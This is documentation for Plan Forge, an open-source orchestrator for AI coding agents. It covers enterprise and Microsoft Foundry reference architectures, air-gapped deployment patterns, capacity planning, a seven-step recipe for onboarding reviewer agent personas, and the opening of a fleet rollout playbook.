An LLM provider. Plan Forge talks to Anthropic, OpenAI, xAI, GitHub Copilot, Microsoft Foundry. Pick yours.
A first-party agent runtime in the Foundry/Agent-Service sense. Plan Forge orchestrates the SDLC; Microsoft Agent Framework and Foundry Agent Service are the agent runtime layer one altitude below.
A SaaS product. There is no Plan Forge cloud. The dashboard runs on localhost:3100. Customers own their deployment top to bottom.

Quick start for evaluators

If you have 30 minutes:

Read Reference Architecture for the picture.
Read GitHub Stack Alignment for the why.
Skim Compliance and Data Residency; Sections 1–3 cover 80% of typical security review questions.

If you have 90 minutes:

Read Fleet Operator Playbook, which gives you a calendar, not a feature list.
Read Agent Factory Recipe, the concrete onboarding pattern.

If you want to run it:

Follow the Quickstart walkthrough, then return here for the multi-team patterns.

Engineering principles that make this work

Plan Forge is built on five non-negotiables that show up in every layer:

Architecture-first: every change asks five questions before code is written (see .github/instructions/architecture-principles.instructions.md)
Separation of concerns: orchestrator → worker → repository → presentation, never collapsed
Test-driven for business logic: Red → Green → Refactor
Type safety: explicit types at every boundary
Open standards: AGENTS.md, MCP, Skills, OTel gen_ai.* (adopt, don't invent)

Customers can read the same instruction files Plan Forge agents read. Nothing is hidden. The framework is the documentation.

Support model

Plan Forge is open source (MIT). The support model is stated plainly:

Issues on GitHub for bugs and feature requests
GitHub Discussions for usage questions
Self-repair tooling built in: forge_meta_bug_file lets agents file defects against Plan Forge itself when they encounter them, and the project is dogfooded against itself
No commercial support tier today. This may change. When it does, the open-source core stays open source.

For enterprises that need a commercial relationship, the right pattern today is to use Plan Forge directly and engage your usual platform-services partner (Microsoft FDE, Slalom, Accenture, etc.) for integration work.

An architectural blueprint scroll on the workbench drawing itself into a 5-layer stacked tower of glowing translucent rectangles, anchored at the anvil base, with Azure-blue accents suggesting a cloud tenant boundary

Appendix K

Enterprise Reference Architecture

One canonical architecture for a 5-team / 1000-developer fleet, plus the Microsoft Foundry composition variant for Azure-tenant deployments.

Audience: Platform architects and security engineers planning a multi-team Plan Forge deployment.

Scope: Generic enterprise architecture (Pattern A), the Microsoft Foundry composition variant (Pattern B), and three network/isolation patterns, including the air-gapped option that is a structural differentiator.

Design principles

Three constraints shape every architecture below:

Local-first control plane. The Plan Forge orchestrator runs on the developer's box or a CI runner. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM.
GitHub-native by design. Plan Forge consumes GitHub Issues, Copilot Cloud Agent, Actions, AGENTS.md, MCP, and the github-mcp-server as its substrate. This reinforces a GitHub Enterprise + Copilot Enterprise consolidation rather than competing with it.
Open standards throughout. AGENTS.md (Linux Foundation), MCP (Linux Foundation), Agent Skills (Apache 2.0, Anthropic-maintained), OpenTelemetry gen_ai.* semantic conventions. No proprietary file formats.

Reference architecture A — Generic enterprise (5 teams, 1000 developers)

Generic 5-team enterprise reference architecture: developer workstations → GitHub Enterprise → CI/fleet execution → observability → LLM provider, all within the customer's network boundary. — Generic enterprise reference architecture, 5 teams × ~200 developers. Plan Forge orchestrator runs in the customer's network; only LLM inference may cross the boundary depending on provider choice.

Component responsibilities

Component	Owns	Does not own
Developer workstation	Local plan execution, IDE-time orchestration, the dashboard, all `.forge/` artifacts	Multi-team aggregation, long-running compute
GitHub Enterprise	Source of truth for repos, issues, PRs. Hosts Copilot Cloud Agent runs. Runs Actions workflows	Plan-level orchestration. Quality / eval / drift detection
Actions runners	Long-running plan execution, scheduled `pforge run-plan` jobs, fleet-scale dispatch	Interactive developer-loop workflows
OTel collector + backend	All trace, metric, and log aggregation across teams	Real-time agent control
LLM provider	Inference for worker LLM calls	Plan state, scope enforcement, gate validation

Data flow

Developer (or CI) starts a plan run.
Plan Forge orchestrator reads the plan file, builds the slice DAG, dispatches each slice to the configured worker (Copilot Cloud Agent for GitHub-native runs, Claude Code / Codex CLI for direct runs, etc.).
Worker consumes AGENTS.md + plan slice context + MCP tools. Calls the configured LLM provider for completions.
Plan Forge runs the slice's validation gate. On pass, advances. On fail, retries with reflexion or escalates per plan policy.
Cost, trace, and event data is appended to .forge/runs/<id>/ locally and emitted to the OTel collector for fleet aggregation.
PR is opened (Cloud Agent path) or commit is staged (direct path). Plan-aware diff (pforge diff) checks scope-contract adherence before merge.
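The core of the data flow above (build the slice DAG, dispatch each slice, run its gate, then advance or escalate) can be sketched in a few lines. This is an illustration only: run_worker and gate_passes are hypothetical callables, the retry budget is an assumed value, and the real orchestrator's retry-with-reflexion and plan-policy handling are not modeled here.

```python
from graphlib import TopologicalSorter
from typing import Callable, Dict, List, Set


def run_plan(
    slices: Dict[str, Set[str]],          # slice id -> ids of slices it depends on
    run_worker: Callable[[str], None],    # hypothetical: executes one slice
    gate_passes: Callable[[str], bool],   # hypothetical: runs the slice's validation gate
    max_attempts: int = 2,                # assumed retry budget
) -> List[str]:
    """Run slices in dependency order; escalate when a gate keeps failing."""
    completed: List[str] = []
    for slice_id in TopologicalSorter(slices).static_order():
        for _ in range(max_attempts):
            run_worker(slice_id)
            if gate_passes(slice_id):
                completed.append(slice_id)
                break
        else:
            # Every attempt failed the gate: stop instead of advancing.
            raise RuntimeError(f"slice {slice_id!r} failed its gate {max_attempts} times")
    return completed


plan = {"schema": set(), "api": {"schema"}, "ui": {"api"}}
print(run_plan(plan, run_worker=lambda s: None, gate_passes=lambda s: True))
# ['schema', 'api', 'ui']
```

Using a topological order guarantees that no slice is dispatched before the slices it depends on have passed their gates.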

Reference architecture B — Microsoft Foundry variant

For customers running on Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes as the SDLC orchestrator layer above Foundry's model gateway and agent runtime.

Microsoft Foundry composition variant. Plan Forge sits above Foundry as the SDLC orchestrator; Foundry sits below as model gateway and production agent runtime.

What sits where

Plan Forge above Foundry: Plan Forge is the SDLC orchestrator (specify, plan, harden, execute, validate, ship). Foundry is the model gateway and production agent runtime. Plan Forge is not inside Foundry, not beside Foundry as a peer agent product, but above Foundry as the higher-altitude orchestration layer.
Foundry as model provider: Plan Forge talks to AOAI via the OpenAI-compatible endpoint https://{resource}.openai.azure.com/openai/v1/. Auth via Entra ID (recommended), API key, or managed identity. Customer configures deployment names, not model families.
Foundry Toolbox as shared MCP surface: Customer's curated, governed, audited tool surface, exposed once via Foundry Toolbox, consumed by Plan Forge in worker sessions and by Foundry agents in production. Single source of truth for org tools.
App Insights as OTel sink: Plan Forge emits OTel traces (per the gen_ai.* spec). Pointed at the Foundry-attached Application Insights resource, Plan Forge runs show up in the same dashboards as Foundry agent runs.
Plan Forge generates code that deploys to Foundry: A Plan Forge plan can ship a feature that is a Foundry agent. deploy.instructions.md and the skill system include /staging-deploy and similar skills that target Foundry deployment paths.

What does not compose

Plan Forge workers do not run as Foundry hosted agents. Different lifetimes, different IO models. Plan Forge workers need filesystem/git/terminal; Foundry hosted agents are containerized with VM-isolated sandboxes per session.
Plan Forge does not register itself as a Foundry "fleet view" entity. Integration is one-way (Plan Forge writes to App Insights); the single pane of glass for Plan Forge runs is the Plan Forge dashboard.

Auth flow (Entra recommended)

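from azure.identity import DefaultAzureCredential, get_bearer_token_provider
from openai import OpenAI

# Exchange the ambient Entra ID credential for bearer tokens on demand.
token_provider = get_bearer_token_provider(
    DefaultAzureCredential(), "https://ai.azure.com/.default"
)

# Point the standard OpenAI client at the resource's OpenAI-compatible v1 endpoint;
# the token provider is passed where an API key would otherwise go.
client = OpenAI(
    base_url="https://YOUR-RESOURCE.openai.azure.com/openai/v1/",
    api_key=token_provider,
)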

Required role assignment on the Foundry resource: Cognitive Services OpenAI User or Contributor.

Friction to design around

Deployment-name vs model-name: Customer says "I'm using gpt-5.4-mini"; Plan Forge needs the deployment name (e.g., eastus-prod-mini).
AOAI quota differs from OpenAI: Fixed TPM quotas per region per model, plus PTU for provisioned. A slice estimating 150K tokens against a 100K TPM deployment will throttle mid-run. Plan ahead.
Government cloud: Azure Gov has a reduced model catalog (gpt-5.1, gpt-4.1 family, o3-mini, gpt-4o). Use the power-gov quorum preset (or graceful fallback) when targeting Azure Government.
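The first two friction points lend themselves to a small preflight check. The sketch below is hypothetical: the DEPLOYMENTS mapping and the function names are illustrative and not part of Plan Forge, and the throttle check pessimistically assumes the whole slice lands inside a single one-minute quota window.

```python
import math

# Hypothetical mapping from the model a user names to the AOAI deployment name.
DEPLOYMENTS = {"gpt-5.4-mini": "eastus-prod-mini"}


def resolve_deployment(model_name: str) -> str:
    """Translate a model name into the deployment name the endpoint expects."""
    try:
        return DEPLOYMENTS[model_name]
    except KeyError:
        raise ValueError(f"no deployment configured for model {model_name!r}") from None


def will_throttle(estimated_tokens: int, tpm_quota: int) -> bool:
    """True when the slice cannot fit inside one minute of quota."""
    return estimated_tokens > tpm_quota


def minutes_needed(estimated_tokens: int, tpm_quota: int) -> int:
    """Minimum whole minutes needed to push the tokens through a TPM-limited deployment."""
    return math.ceil(estimated_tokens / tpm_quota)


print(resolve_deployment("gpt-5.4-mini"))   # eastus-prod-mini
print(will_throttle(150_000, 100_000))      # True
print(minutes_needed(150_000, 100_000))     # 2
```

With the numbers from the text, a 150K-token slice against a 100K TPM deployment needs at least two quota windows, which is why it throttles mid-run.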

Network and isolation patterns

Pattern 1: Fully cloud-LLM (typical SaaS company)

LLM calls go to public Anthropic / OpenAI / GitHub Copilot endpoints
Plan Forge runs locally, traces go to cloud-hosted observability
Lowest cost, fastest setup, weakest isolation
Right for: most non-regulated companies, internal tooling, dev productivity

Pattern 2: Hybrid (Microsoft-shop typical)

LLM calls go to Azure OpenAI in customer's tenant via private endpoint
Plan Forge runs locally and in customer's Azure DevOps / GitHub Actions
Traces to App Insights in same Azure subscription
Right for: regulated SaaS, fintech, healthtech with Microsoft preference

Pattern 3: Air-gapped (defense, sovereign cloud, regulated)

LLM calls go to on-prem inference (Foundry Local powered by Azure Local, Ollama, vLLM, or similar)
Plan Forge runs entirely in-network; no calls leave the boundary
OTel collector + backend in-network
GitHub Enterprise Server (GHES) instead of cloud
Right for: defense, FedRAMP High, IL5/IL6, sovereign cloud customers

Plan Forge is structurally compatible with all three. Pattern 3 is the differentiator: Cursor cannot offer this (control plane in AWS), Sourcegraph Amp explicitly cannot (no self-host, no BYOK), and GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.

Capacity planning

Per-team sizing (typical)

For a team of ~50 developers running ~3 plans/day per developer:

Resource	Estimate
Plan Forge orchestrator processes	One per active developer, low CPU/memory (Node.js process, dashboard at :3100)
GitHub Actions minutes (CCA-dispatched plans)	~15K min/month (varies wildly by plan complexity)
LLM tokens (mixed-mode quorum)	~50M input + 10M output per team-month at moderate use
Storage (`.forge/runs/` retention)	~5GB / team / quarter at typical detail
OTel trace volume	~100K spans / team / day
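To turn the per-team figures into a fleet-level estimate, the arithmetic can be sketched as below. The numbers are copied from the table above for a ~50-developer team; scaling linearly by team count is an assumption, and teams of a different size (such as the ~200-developer teams in Reference architecture A) would need their own per-team figures.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TeamEstimate:
    """Per-team figures copied from the sizing table."""
    developers: int = 50
    plans_per_dev_per_day: int = 3
    actions_minutes_per_month: int = 15_000
    input_tokens_per_month: int = 50_000_000
    output_tokens_per_month: int = 10_000_000
    storage_gb_per_quarter: int = 5
    spans_per_day: int = 100_000

    @property
    def plans_per_day(self) -> int:
        return self.developers * self.plans_per_dev_per_day

    def fleet(self, teams: int) -> dict:
        """Scale to `teams` teams, assuming every team matches this profile."""
        tokens = self.input_tokens_per_month + self.output_tokens_per_month
        return {
            "plans_per_day": self.plans_per_day * teams,
            "actions_minutes_per_month": self.actions_minutes_per_month * teams,
            "tokens_per_month": tokens * teams,
            "storage_gb_per_quarter": self.storage_gb_per_quarter * teams,
            "spans_per_day": self.spans_per_day * teams,
        }


team = TeamEstimate()
print(team.plans_per_day)                 # 150
print(team.fleet(5)["tokens_per_month"])  # 300000000
```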

Org-level governance

Custom properties on repos to scope which Plan Forge plans are allowed
Org runner policies to control which Cloud Agent runners are available
Branch protection rules to require Plan Forge gate-passed status before merge
Cost budgets in .forge.json per repo or per team

Failure modes and mitigations

Failure	Detection	Mitigation
LLM provider outage	OTel error rate spike on `gen_ai.*` spans	Plan Forge supports multi-provider routing in `.forge.json`. Failover order configurable per slice
AOAI quota exhausted mid-slice	Worker error, gate failure	Preflight quota check (planned), slice retry with backoff, cross-region failover via deployment alias
GitHub Actions runner exhaustion	Workflow queue depth, Cloud Agent session pending	Self-hosted runner pool, prioritize critical plans via `[P]` tag and runner labels
Plan drift (PR diverges from approved plan)	`pforge diff` post-execution	Pre-merge gate fails; reviewer-gate agent flags; review thread opened via `forge_review_add`
Cost runaway (slice loops or model misroutes)	`forge_cost_report` anomaly, dashboard cost-tile alert	Per-slice `workerTimeoutMs` cap, `forge_alert_triage` priority queue, in-loop stuck detector (planned)
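The provider-outage mitigation in the first row amounts to trying providers in a configured order. The sketch below shows that idea in isolation; the provider callables and the ProviderError type are hypothetical, and the actual routing schema in .forge.json is not reproduced here.

```python
from typing import Callable, Sequence, Tuple


class ProviderError(Exception):
    """Raised by a provider call that could not complete (outage, quota, timeout)."""


def call_with_failover(
    prompt: str,
    providers: Sequence[Tuple[str, Callable[[str], str]]],  # (name, call) in failover order
) -> Tuple[str, str]:
    """Try each provider in order; return (provider name, completion) from the first success."""
    errors = []
    for name, call in providers:
        try:
            return name, call(prompt)
        except ProviderError as exc:
            errors.append(f"{name}: {exc}")
    raise ProviderError("all providers failed: " + "; ".join(errors))


def primary(prompt: str) -> str:
    raise ProviderError("simulated outage")


def secondary(prompt: str) -> str:
    return f"echo: {prompt}"


print(call_with_failover("hello", [("primary", primary), ("secondary", secondary)]))
# ('secondary', 'echo: hello')
```

Collecting the per-provider errors before raising keeps the final failure message useful when every provider in the list is down.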

Reference deployment timeline

For an enterprise rolling out across 5 teams in 90 days:

Week	Milestone
0	Stakeholder alignment, pick LLM provider strategy, identify pilot team
1–2	Pilot team installs Plan Forge, runs first plan against a known-easy feature, baseline cost + cycle time
3–4	Pilot team runs 5+ plans, refines instruction files, captures lessons
5–6	Add team 2 + team 3 in parallel; first multi-team observability dashboards
7–8	Add teams 4 + 5; introduce shared MCP server (Foundry Toolbox or in-house equivalent)
9–10	Org-wide rollout patterns formalized; cost guardrails; quality KPIs reported up
11–12	First quarterly review; eval data informs next-quarter planning

See Appendix M — Fleet Operator Playbook for week-by-week specifics.

Twelve glowing humanoid silhouettes of varied specialist roles arranged in a semicircle around the anvil, each with a different colored aura (security blue, performance red, architecture green); a glowing recipe scroll at the center on the anvil

Appendix L

Agent Factory Recipe

Get a fleet of specialized agents productive on Day 1, not Day 90. A repeatable 7-step recipe.

Audience: Platform leads onboarding 12+ "Virtual Squad" agent personas across product teams in the first weeks of a Plan Forge rollout.

Goal: One work day for the first squad, one hour per additional squad thereafter.

What "Agent Factory" means in Plan Forge

Plan Forge ships 19 agent personas out of the box (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier). Each is a Markdown file under .github/agents/ with a YAML frontmatter description and a body that defines the persona's expertise, tone, and lane. Agents are invoked from chat (agent picker dropdown) or referenced from a plan slice (agent: security-reviewer). They cannot edit files; they audit and report.

The "Agent Factory" is the configuration plus convention layer that makes those 19 personas productive against a customer's specific stack on Day 1, instead of generic-but-vague.

The recipe in one page

1. SUBSTRATE:      confirm GitHub-native primitives are in place
2. CONFIGURE:      write project profile + project principles (one hour each)
3. ROUTE:          assign agents to lanes (which agents own which kinds of work)
4. SHARED CONTEXT: populate AGENTS.md, copilot-instructions.md, instruction files
5. SHARED TOOLS:   point at MCP servers (Plan Forge MCP, github-mcp-server, optional Foundry Toolbox)
6. PILOT:          run one real plan with the full agent fleet, capture friction
7. ITERATE:        encode lessons in instruction files; re-run

Each step below takes between 15 minutes and two hours for a platform lead familiar with the codebase. The whole recipe is achievable in one work day for the first squad and replicates in one hour per additional squad thereafter.

Step 1 — Substrate check (15 min)

Verify the GitHub-native primitives Plan Forge depends on are enabled in the org:

Primitive	Check	If missing
GitHub Copilot Enterprise	Org admin → Copilot tab → "Copilot Enterprise" enabled	Provision before continuing
Copilot Cloud Agent	Org admin → Copilot tab → Cloud Agent toggle ON for target repos (or via custom properties)	Enable per GitHub docs
GitHub Actions enabled per repo	Repo settings → Actions → "Allow all actions" or specific allowlist	Enable per repo
MCP support in IDE	VS Code 1.99+ with `chat.mcp.enabled` setting on, or Copilot CLI 1.x	Update IDE / install CLI
AGENTS.md aware tooling	At least one of: Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf	Pick at least one; they're Plan Forge's worker options for non-CCA paths

If any are missing, fix before moving on. The factory recipe assumes the substrate is in place.

Step 2 — Configure project profile and principles (2 hr)

Plan Forge ships two prompts that, run once, produce the configuration that downstream agents inherit:

`project-profile.prompt.md` — what your stack is

A guided interview that produces .github/instructions/project-profile.instructions.md. Captures:

Languages, frameworks, ORM, test framework
Build / test / lint / dev commands
Compliance frameworks (SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP)
Coding standards (naming, file organization, import ordering)
Database conventions, API patterns, error handling preferences

This file auto-loads (via applyTo: '**' in frontmatter) for every agent session in the repo. Run it once per repo. It's the foundation everything else assumes.

`project-principles.prompt.md` — what your team commits to

A second interview that produces docs/plans/PROJECT-PRINCIPLES.md plus a companion .github/instructions/project-principles.instructions.md. Captures:

Architectural commitments (what you will and won't build)
Forbidden patterns (anti-patterns specific to your codebase)
Boundaries (what's in scope for AI-driven work, what isn't)

This file is loaded by the SessionStart hook and pinned in agent context for the duration of every session.

Why both

Profile = facts about the stack. Principles = commitments about how the team works. Confusing the two is a common mistake. Profile is descriptive; principles is prescriptive. Both feed every agent every session.

Step 3 — Route agents to lanes (30 min)

Plan Forge ships these 19 personas. Decide who owns what for your team:

Stack-specific reviewers (6)

Agent	Owns
`architecture-reviewer`	Layer separation, pattern adherence, refactor proposals
`database-reviewer`	Schema, migrations, query performance, ORM patterns
`deploy-reviewer`	Dockerfiles, CI/CD config, deployment scripts
`performance-reviewer`	Hot/cold path analysis, allocation, profiling
`security-reviewer`	Input validation, secret handling, OWASP, auth
`test-runner`	Test coverage, test quality, fixture sanity

Cross-stack reviewers (7)

Agent	Owns
`api-contracts-reviewer`	OpenAPI consistency, breaking change detection
`accessibility-reviewer`	WCAG, ARIA, keyboard navigation
`multi-tenancy-reviewer`	Tenant isolation, row-level security, cross-tenant query risk
`ci-cd-reviewer`	Pipeline correctness, runner sanity, gate completeness
`observability-reviewer`	Trace coverage, log quality, metric meaningfulness
`dependency-reviewer`	Vulnerability scanning, license compliance, version hygiene
`compliance-reviewer`	GDPR / CCPA / SOC2 / HIPAA / PCI-DSS conformance

Pipeline agents (5) — these have handoff buttons

Agent	Stage
`specifier`	Step 0: define what & why
`plan-hardener`	Step 2: harden plan into execution contract
`executor`	Step 3: execute slices with validation gates
`reviewer-gate`	Step 5: independent review and drift detection
`shipper`	Step 6: commit, deploy, close

Step 1 (preflight) ships as a prompt, not an agent; see .github/prompts/step1-preflight-check.prompt.md. It runs inline rather than as a separate persona.

Audit / classifier (1)

Agent	Role
`audit-classifier-reviewer`	Reviews changes to the audit classifier itself; enforces before/after finding counts

Routing decisions to make

For each agent, pick:

Owner: which team member (or rotation) is the human reviewer when this agent fires?
Trigger: automatic on PR? Manual via slash command? Plan-slice-bound?
Authority: advisory (commenter), gating (blocks merge), or escalation-only (raises an issue)?

Document the routing in .github/agents/ROUTING.md (you may need to create this; it's not yet a Plan Forge default, but the convention is clean and we recommend adopting it).
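One way to keep the three routing decisions consistent is to record them as data and render the routing file from that. The sketch below is an assumed convention, not a Plan Forge format: the Route fields mirror the owner / trigger / authority choices above, and the owner name "appsec-rotation" is a made-up example.

```python
from dataclasses import dataclass
from enum import Enum
from typing import List


class Trigger(Enum):
    AUTOMATIC_ON_PR = "automatic-on-pr"
    SLASH_COMMAND = "slash-command"
    PLAN_SLICE = "plan-slice"


class Authority(Enum):
    ADVISORY = "advisory"
    GATING = "gating"
    ESCALATION_ONLY = "escalation-only"


@dataclass(frozen=True)
class Route:
    agent: str
    owner: str
    trigger: Trigger
    authority: Authority


def to_markdown(routes: List[Route]) -> str:
    """Render the routing decisions as a Markdown table, one row per agent."""
    lines = [
        "| Agent | Owner | Trigger | Authority |",
        "| --- | --- | --- | --- |",
    ]
    for r in routes:
        lines.append(f"| {r.agent} | {r.owner} | {r.trigger.value} | {r.authority.value} |")
    return "\n".join(lines)


routes = [
    Route("security-reviewer", "appsec-rotation", Trigger.AUTOMATIC_ON_PR, Authority.GATING),
]
print(to_markdown(routes))
```

Using enums for trigger and authority means a typo in either column fails at construction time instead of silently producing an unroutable agent.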

Step 4 — Shared context: AGENTS.md and instruction files (2 hr)

Plan Forge generates these on setup.ps1 / setup.sh. The factory step is to populate them with project-specific content beyond the templated defaults.

`AGENTS.md` (repo root)

The Linux Foundation-stewarded standard read by Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf, and others. Contents:

Project overview (one paragraph)
Build / test / lint / dev commands (the substantive ones, not generic placeholders)
Code style conventions
Testing conventions
Security considerations
PR conventions

Plan Forge keeps this in sync with the project-profile output, but review the generated content: generic phrasing here costs you on every agent run.

`.github/copilot-instructions.md`

The GitHub-native equivalent. Contains:

Architecture principles link
Quick commands
Coding standards summary
Pipeline overview
Skill / agent / hook references

Plan Forge generates a strong default. Customize the "Project Overview" section with your team's specifics.

`.github/instructions/*.instructions.md`

Plan Forge ships 18 of these per preset (the dotnet/typescript/python/etc. preset directories under presets/, each with its own .github/instructions/). Each has an applyTo glob that controls when it auto-loads:

File	Loads on
`architecture-principles.instructions.md`	`**` (always, universal baseline)
`project-profile.instructions.md`	`**` (always, your stack)
`project-principles.instructions.md`	`**` if `PROJECT-PRINCIPLES.md` exists
`git-workflow.instructions.md`	`**`
`api-patterns.instructions.md`	`**`
`auth.instructions.md`	`**`
`database.instructions.md`	`**`
`security.instructions.md`	`**`
`testing.instructions.md`	`**`
`errorhandling.instructions.md`	`**`
`deploy.instructions.md`	`**`
`observability.instructions.md`	`**`
`caching.instructions.md`	`**`
`messaging.instructions.md`	`**`
`multi-environment.instructions.md`	`**`
`performance.instructions.md`	`**`
`version.instructions.md`	`**`
`status-reporting.instructions.md`	`docs/plans/`, `pforge-mcp/`, `.forge/**`
`context-fuel.instructions.md`	`**`
`self-repair-reporting.instructions.md`	`**`

These are templated. Read each one. Add team-specific guidance where the template is generic.
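To reason about which instruction files load for a given path, the applyTo column can be approximated with simple glob matching. The sketch below is an approximation under stated assumptions: it uses Python's fnmatchcase (in which * also matches path separators) rather than the editor's own glob engine, and it treats a pattern ending in / as "everything under that directory". Only two rows of the table are included.

```python
from fnmatch import fnmatchcase
from typing import List

# Two rows copied from the table above; extend with the rest as needed.
APPLY_TO = {
    "architecture-principles.instructions.md": ["**"],
    "status-reporting.instructions.md": ["docs/plans/", "pforge-mcp/", ".forge/**"],
}


def pattern_matches(path: str, pattern: str) -> bool:
    if pattern.endswith("/"):
        # Assumption: a bare directory pattern covers every file beneath it.
        return path.startswith(pattern)
    return fnmatchcase(path, pattern)


def files_loaded_for(path: str) -> List[str]:
    """Return the instruction files whose applyTo patterns match `path`."""
    return [
        name
        for name, patterns in APPLY_TO.items()
        if any(pattern_matches(path, p) for p in patterns)
    ]


print(files_loaded_for("src/app.ts"))
# ['architecture-principles.instructions.md']
print(files_loaded_for(".forge/runs/1/events.json"))
# ['architecture-principles.instructions.md', 'status-reporting.instructions.md']
```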

Step 5 — Shared tools: MCP server selection (30 min)

Configure .vscode/mcp.json (Plan Forge generates this; you augment) with the MCP servers the fleet should share:

Required

{
  "mcpServers": {
    "plan-forge": {
      "command": "node",
      "args": ["./pforge-mcp/server.mjs"]
    }
  }
}

Strongly recommended

{
  "github": {
    "url": "https://api.githubcopilot.com/mcp/",
    "auth": "oauth"
  }
}

The github-mcp-server gives every agent in the fleet first-class access to GitHub Issues, PRs, repos, code-scanning alerts, and 19 other toolsets. 29.5k stars, MIT, official.

For Microsoft-shop fleets

{
  "foundry-toolbox": {
    "url": "https://YOUR-FOUNDRY-TOOLBOX-ENDPOINT/mcp",
    "auth": {
      "type": "bearer",
      "tokenSource": "azure-keyvault://your-vault/foundry-toolbox-pat"
    }
  }
}

Foundry Toolboxes are MCP-compatible endpoints that bundle Web Search, Code Interpreter, File Search, Azure AI Search, OpenAPI tools, and Agent-to-Agent connections behind a single endpoint with versioning, auth, and policy enforcement. Single source of truth for the org's tools, consumed identically by Plan Forge agents in worker sessions and by Foundry agents in production.

For Azure DevOps shops

{
  "azure-devops": {
    "url": "https://YOUR-FOUNDRY-CATALOG/mcp/azuredevops",
    "auth": "oauth"
  }
}

Microsoft ships an Azure DevOps MCP Server (preview) as a Foundry catalog entry.
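
The fragments above are shown separately, so it may help to see how they could combine into one file. The sketch below assumes each optional fragment becomes a sibling entry under `mcpServers`, next to `plan-forge`; the text does not state this, and the helper name `merge_mcp_servers` is hypothetical.

```python
import json


def merge_mcp_servers(base: dict, *fragments: dict) -> dict:
    """Return a copy of `base` with each fragment's entries added under "mcpServers".

    Assumption: optional servers are siblings of "plan-forge" in the same map.
    """
    merged = {**base, "mcpServers": dict(base.get("mcpServers", {}))}
    for fragment in fragments:
        for name, entry in fragment.items():
            if name in merged["mcpServers"]:
                raise ValueError(f"duplicate MCP server name: {name}")
            merged["mcpServers"][name] = entry
    return merged


required = {
    "mcpServers": {
        "plan-forge": {"command": "node", "args": ["./pforge-mcp/server.mjs"]}
    }
}
github = {"github": {"url": "https://api.githubcopilot.com/mcp/", "auth": "oauth"}}

config = merge_mcp_servers(required, github)
print(json.dumps(config, indent=2))
```

Rejecting duplicate names keeps a team-level fragment from silently overriding the generated `plan-forge` entry.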

Step 6 — Pilot run (1–2 hr including observation)

Pick a real, small feature for the pilot. Not a toy. Not a refactor. A tangible feature with a clear acceptance criterion.

Run the full pipeline:

step0-specify-feature.prompt.md: define what and why
step1-preflight-check.prompt.md: verify prerequisites
step2-harden-plan.prompt.md: harden the plan into an execution contract
pforge run-plan --estimate <plan>: see projected cost under each quorum mode
pforge run-plan <plan>: execute (or --assisted for human-in-the-loop)
step5-review-gate.prompt.md: independent review

Watch for:

Drift between plan and PR: pforge diff should be clean. If it's not, the plan was too vague.
Gate failures: count them. Each gate failure is a lesson. Capture it as an instruction-file edit so future agents don't repeat it.
Cost surprises: the estimate vs. actual delta tells you whether your plan complexity scoring is accurate.
Reviewer-agent noise: too quiet means the agent isn't loaded with enough context; too loud means the lanes are wrong.

Step 7 — Iterate: encode lessons in instruction files (ongoing)

Every Plan Forge project should be doing this constantly:

Friction point in a plan → update the relevant instruction file
Gate failure → tighten the gate or update plan-hardener prompt
Reviewer false positive → adjust the agent persona definition
Cost overrun → revise complexity threshold or quorum routing

The factory's value compounds. The first plan teaches you 5 things. The fifth plan teaches you 1. By the tenth plan, the agents are productive against your specific codebase, not generic.

Scaling the factory

After the first squad is productive, replicate to additional teams:

Fork the project profile for each team's repos (their stack may differ slightly)
Reuse the principles when teams share architectural commitments
Reuse the agent routing as a starting point; customize per team's review culture
Share the AGENTS.md content discipline: every team should read and refine its AGENTS.md monthly

For a 5-team / 1000-dev rollout, the factory typically takes:

Team 1: 2–3 days (figuring out the patterns)
Team 2: 1 day (with the patterns in hand)
Teams 3–5: 4 hours each (mostly project-profile customization)

Common mistakes

Mistake	Symptom	Fix
Generic project profile	Agents give generic advice; reviewers ignore them	Re-run `project-profile.prompt.md` with thoughtful answers, not defaults
No project principles	Agents drift outside scope; PRs widen unexpectedly	Run `project-principles.prompt.md`; document forbidden patterns explicitly
Default agent routing	Reviewers fire on irrelevant changes; humans tune them out	Document routing in `.github/agents/ROUTING.md` per team
Skip AGENTS.md customization	AGENTS.md-aware agents (Cursor, Claude Code) give weak suggestions	Read the generated AGENTS.md; add team-specific build/test/style content
One MCP server forever	Agents lack access to org-specific tools; humans bridge manually	Add Foundry Toolbox or in-house MCP servers as fleet matures
First plan is a toy	Lessons don't scale to real work	Pilot a real, small feature, never a hello-world
No iteration loop	Same friction in plan 2, plan 3, plan 4	After every plan, ask "what would make plan N+1 better?", encode the answer in instruction files

What success looks like

After 30 days with the factory in place:

Time from "feature spec" to "PR open" drops 50–70% for in-scope work
Plan Forge plans pass review with pforge diff clean ≥ 80% of the time
Per-team cost-per-merged-PR is tracked and trending stable or down
Reviewer agents catch 30–50% of issues before human review (depending on team and codebase)
Onboarding new engineers takes hours not weeks (the agents are the institutional knowledge)

These are real numbers from dogfooding. They scale linearly with the discipline applied to the factory configuration.


Appendix M

Fleet Operator Playbook

A calendar, not a feature list. Day 1 / Week 4 / Week 12 milestones with concrete go/no-go criteria for operating Plan Forge across multiple product teams.

Audience: Platform leads operating Plan Forge across multiple product teams.

How to use: Each phase has a goal, activities, go/no-go criteria, and anti-patterns. If you're following it strictly and something feels off, that's a signal worth investigating, not a step to skip.

Day 0 — Prerequisites

Before you begin:

GitHub Enterprise + Copilot Enterprise + Copilot Cloud Agent enabled on target repos
LLM provider strategy decided (Anthropic, OpenAI, xAI, GitHub Copilot, Microsoft Foundry, or combination)
Pilot team identified (one team, 5–15 engineers, real product work, not a sandbox)
Executive sponsor named (someone who can defend cycle-time experiments at QBR)
Initial budget envelope set (~$2K–$10K for the first month per team, varies wildly)
OTel collector + observability backend chosen (Splunk, Datadog, Grafana, App Insights)

If any of these aren't true, work on them first. Plan Forge accelerates teams that already have direction; it doesn't substitute for it.

Day 1 — Pilot installation

Goal

Pilot team has Plan Forge installed, has run one plan end-to-end against a real (small) feature, and has a baseline measurement of cycle time and cost.

Activities (~4–6 hours total)

Install (30 min)
- Clone Plan Forge to each pilot dev's machine: git clone https://github.com/srnichols/plan-forge
